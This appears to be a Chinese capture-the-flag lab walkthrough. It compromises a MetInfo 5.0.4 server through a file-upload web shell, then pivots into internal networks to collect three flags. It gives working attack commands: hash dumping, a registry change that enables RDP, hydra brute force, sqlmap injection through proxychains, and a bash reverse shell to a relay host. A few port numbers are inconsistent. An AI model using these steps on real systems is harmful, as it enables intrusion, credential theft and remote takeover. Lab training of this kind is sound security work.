实验环境:
一个外网+两个内网
注:外网,可以访问到物理机,网卡为nat3;
物理机访问----->192.168.100.130
实验要求:
本环境共设置3个flag,在实验过程中不允许操作虚拟机。
步骤详解:
1.搭建环境,确保物理机ip为192.168.100.xxx网段。
2.物理机访问192.168.100.130,能够进入。并发现版本为MetInfo 5.0.4。
3.发现是cms,先收集信息,上网百度一波。(有疑惑的可参考:https://blog.csdn.net/Zer0ooo/article/details/103190622)
4.根据搜集的信息发现,有文件上传漏洞。
我是参考的这篇文章https://blog.csdn.net/key_book/article/details/80604830
5.在桌面新建一个1.html文档,利用漏洞上传大马。
(注:记得修改路径。)
6.用火狐(或谷歌)打开1.html,上传一句话木马。
7.访问http://192.168.100.130/upload/file/1574390716.php,并测试成功。
8.用菜刀连接,成功后打开虚拟终端,whoami,发现是system权限。
9.在回收站上传QuarksPwDump.exe,
在终端输入C:\RECYCLER\QuarksPwDump.exe --dump-hash-local获取密码。
10.通过cmd5解码,账户名:Administrator 密码:a1b2c3(记住,下面会用到)
11.接下来尝试远程登录。
首先在终端输入netstat -ano,发现3389端口未开启。
开启3386端口命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
(注:若第一次3389端口没有开启成功,可尝试第二次。)
12.尝试远程登录。
发现报错!!!
没事!问题不大!不要“方”!
13.(敲黑板)知识点:一般开启了3389端口之后,仍然无法远程登录,有两个问题:
(1)开启了防火墙(2)NAT地址转换。NAT只转换80端口。
先尝试用命令把防火墙的3389端口打开。
再次尝试远程登录。成功!点击“是”。
14.通过上面破解的账号密码,远程登录。拿到flag1。
15.进入外网后,ipconfig发现有两张网卡。
16.尝试在里面收集有用信息。
有两种情况:
(1)通过代理进行内网扫描。
(2)通过用户的历史记录。如,浏览器等。
17.尝试查看浏览器的历史记录。
在c:\Documents and Settings\Administrator\Local Setting\History下可以看到。
18.接下来尝试爆破密码。
通过菜刀往win2003上传reGeorg-master/tunnel.nosocker.php
物理机访问 http://192.168.100.130/tunnel.nosocher.php
19.接下来打开kali,运行reGeorg-master
用hydra爆破密码
账号:admin
密码:123456
20.ftp登录成功!
21.找到flag2.
22.发现oa中有admin,尝试登录一下。
23.找到突破口,开始尝试寻找账号密码。
通过代码审计,发现message.php似乎有SQL注入漏洞。
24.尝试发现有SQL注入漏洞。
25.打开kali,用sqlmap暴库。
proxychains sqlmap -u http://10.200.1.16/message.php?id=1 -p id --technique=U --union-cols=2 --tamper space2comment --level 5 --risk 3 --dbs
proxychains sqlmap -u http://10.200.1.16/message.php?id=1 -p id --technique=U --union-cols=2 --tamper space2comment --level 5 --risk 3 -D my_oa --tables
proxychains sqlmap -u http://10.200.1.16/message.php?id=1 -p id --technique=U --union-cols=2 --tamper space2comment --level 5 --risk 3 -D my_oa -T admin --dump
26.获得账号、密码。登录oa系统。
27.上传大马,获取更多权限。
上传成功!
访问http://10.200.1.16/upload/images/20191124041440.php
密码:admin
28.whoami查看系统为Apache,需要提权。
29.先用nc监听5555端口
30. 接下来反弹端口。
用菜刀上传nc、ew到www目录下。
31.接着进行端口转发。
上传ew
先在192.168.100.130的cmd里切换到ew目录:ew_for_Win.exe -s lcx_tran -l 4444 -f 物理机ip地址 -g 5555
32.在大马命令行输入bash -i>& /dev/tcp/10.200.1.10/4444 0>&1
在物理机里切换到nc目录nc.exe -lvvp 555.
33.利用大马上传提权exp.
34.返回物理机,切换到大马上传的路径,更改exp权限(chomd 777 exp1),执行exp(./exp1),查看whoami,切换到root目录下即可看到flag3。